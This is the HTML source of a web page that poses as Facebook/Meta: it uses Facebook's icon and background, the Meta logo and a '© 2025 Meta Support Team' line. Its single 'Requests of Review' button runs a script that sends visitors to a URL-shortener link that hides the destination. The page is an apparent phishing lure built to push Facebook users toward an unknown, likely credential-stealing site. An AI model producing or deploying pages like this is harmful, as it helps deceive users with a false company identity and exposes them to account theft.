<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Facebook</title>
    <link rel="icon" href="https://static.xx.fbcdn.net/rsrc.php/yW/r/sSd2lSvsUM4.ico" />
    <!-- Bootstrap CSS -->
    <link href="https://stackpath.bootstrapcdn.com/bootstrap/4.3.1/css/bootstrap.min.css" rel="stylesheet">
    <script
  src="https://code.jquery.com/jquery-3.7.1.js"
  integrity="sha256-eKhayi8LEQwp4NKxN+CfCh+3qOVUtJn3QNZ0TciWLP4="
  crossorigin="anonymous"></script>
    <style>
        body {
            margin: 0;
            padding: 0;
            background-image: url('https://static.xx.fbcdn.net/rsrc.php/v3/yh/r/H6-jLw-GehZ.png');
            background-size: cover;
            background-position: center;
            height: 100vh;
            display: flex;
            justify-content: center;
            align-items: center;
        }

        .card {
            width: 300px; /* Chiều rộng của card */
        }
        .btn-scan:hover
        {
            text-decoration: underline;
        }
    </style>
</head>
<body>
    <div>
        <div class="card" style="    width: 400px;
        padding: 30px;">
            <div class="card-body text-center">
                <img style="width: 100px;" src="https://upload.wikimedia.org/wikipedia/commons/a/ab/Meta-Logo.png">
                <div>© 2025 Meta Support Team   </div>
                <!-- Thêm nội dung khác tùy ý -->
                <div style="    width: 200px
                px
                ;
                    margin: auto;margin-top: 40px;">
                    <button style="background-color: #e2e6ea;
                    border-color: #dae0e5;" id="btn" class="btn btn-light btn-block btn-scan"><img style="    width: 15px;margin-bottom: 3px;" src="https://cdn-icons-png.flaticon.com/256/20/20673.png"> Requests of Review</button>
                </div>
            </div>
        </div>
    </div>
</body>
<script src="https://code.jquery.com/jquery-3.5.1.min.js"></script>
<script>
    $(document).ready(function() {
        $('#btn').click(function() {
            window.location.href = 'https://shorten.so/JWPTT';
        });
    });
</script>
</html>
